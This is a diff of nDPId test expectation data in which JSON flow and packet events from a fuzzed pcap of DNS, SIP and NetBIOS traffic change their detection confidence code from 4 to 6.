+00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":364,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470303331,"flow_last_seen":1120470307336,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470307336,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": 
{"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470117343,"flow_last_seen":1120470117343,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470307336,"l3_proto":"ip4","src_ip":"14.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470113337,"flow_last_seen":1120470121594,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1120470307336,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120470049696,"flow_last_seen":1120470116279,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":6087,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1120470307336,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1120469540839,"flow_last_seen":1120470257655,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":1842,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120470307336,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1120470049696,"flow_last_seen":1120470116279,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":6087,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1120470307336,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1120469540839,"flow_last_seen":1120470257655,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":1842,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120470307336,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315338,"flow_last_seen":1120470315338,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470315338,"l3_proto":"ip4","src_ip":"192.168.1.57","dst_ip":"192.168.1.1","src_port":2771,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1120470315338,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470315338,"pkt":"ADBUADRWAODtAW69CABFAABEauwAAIARTGnAqAE5wKgBAQrTADUAMCcL\/eAAAAABAAAAAAAAATEBMAEw3TEyNwdpbi1hZGRyBGFycHcAAAwAAQ=="} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315338,"flow_last_seen":1120470315338,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470315338,"l3_proto":"ip4","src_ip":"192.168.1.57","dst_ip":"192.168.1.1","src_port":2771,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315338,"flow_last_seen":1120470315338,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470315338,"l3_proto":"ip4","src_ip":"192.168.1.57","dst_ip":"192.168.1.1","src_port":2771,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315340,"flow_last_seen":1120470315340,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470315340,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2771,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1120470315340,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470315340,"pkt":"AODtAW68ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CtMARwmH\/eCAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQBhJxAACwlsb2NhbGhvc3QA"} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315340,"flow_last_seen":1120470315340,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470315340,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2771,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315340,"flow_last_seen":1120470315340,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470315340,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2771,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":367,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":13,"global_ts_msec":1120470315341} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":367,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":47,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":47,"pkt_l4_len":0,"thread_ts_msec":1120470315340,"pkt":"ADBUADRWAODtAW69CABFAAAhau0AUoARGB8NqAEC1PIhIxPEE8QADcBLICAgNiA="} 
00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315653,"flow_last_seen":1120470315653,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120470315653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1120470315653,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1120470315653,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAADlau4AAIARSsjAqAECwKgB\/wCKAIoA0VstEQ6FJ8CoAQIAigC7AAAgRUVEQURBRENERURHREZDtkNBQ0FDQUNBQ0FDQUNBQ0EAIEVGRURFSkZQRUVFOEVORUJFSkVPQ0FDQUNBQ0FDQUJOAP9TTUIlNgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhBFYAAwABAAAAAgA2AFxNQUlMU0xPVFxCUk9XU0UAAQCA\/AoARDAwMjQ2NQAAAAAAAAAAAAUAA2EAAA8BVaoA"} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315653,"flow_last_seen":1120470315653,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120470315653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":371,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470129591,"flow_last_seen":1120470129593,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470315653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315653,"flow_last_seen":1120470315653,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120470315653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":371,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470129591,"flow_last_seen":1120470129593,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470315653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470327552,"flow_last_seen":1120470327552,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470327552,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1120470327552,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470327552,"pkt":"ADBUOzRWAODtAW69CABFAABIau8AAIARTGLAqAECwKgBAQrUADUANIwPneEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY6qqqqqqqqqqqqqqqqqqqqo="} 
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470327552,"flow_last_seen":1120470327552,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470327552,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470327552,"flow_last_seen":1120470327552,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470327552,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":1120470328547,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470328547,"pkt":"ADBUADRWAODtAW69CABFQABIavAAAIARTGHAqAECwKgBAQrUADUANIwPneEBAACQAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":372,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470327552,"flow_last_seen":1120470328547,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470328547,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":372,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470327552,"flow_last_seen":1120470328547,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470328547,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": 
{"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":3,"flow_last_seen":1120470330550,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470330550,"pkt":"ADBUADRWAODtAW69CABFAABIavEAAIARTGDAqAECwKgBAQrUADUANIwPneEBAAABAAAAAAAABF9zaXAAX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":373,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470327552,"flow_last_seen":1120470330550,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470330550,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip","num_queries":0,"num_answers":0,"reply_code":0,"query_type":24437,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":373,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470327552,"flow_last_seen":1120470330550,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470330550,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip","num_queries":0,"num_answers":0,"reply_code":0,"query_type":24437,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":374,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470332553,"flow_last_seen":1120470332553,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470332553,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.184.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1120470332553,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470332553,"pkt":"ADBUADRWAODtAW69CABFAABIavIAAIARTF\/AqAECwLgBAQrUADUANIwPneEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":374,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470332553,"flow_last_seen":1120470332553,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470332553,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.184.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00886{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470327552,"flow_last_seen":1120470336558,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470336558,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": 
{"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":25197,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":374,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470332553,"flow_last_seen":1120470332553,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470332553,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.184.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00886{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470327552,"flow_last_seen":1120470336558,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470336558,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":25197,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
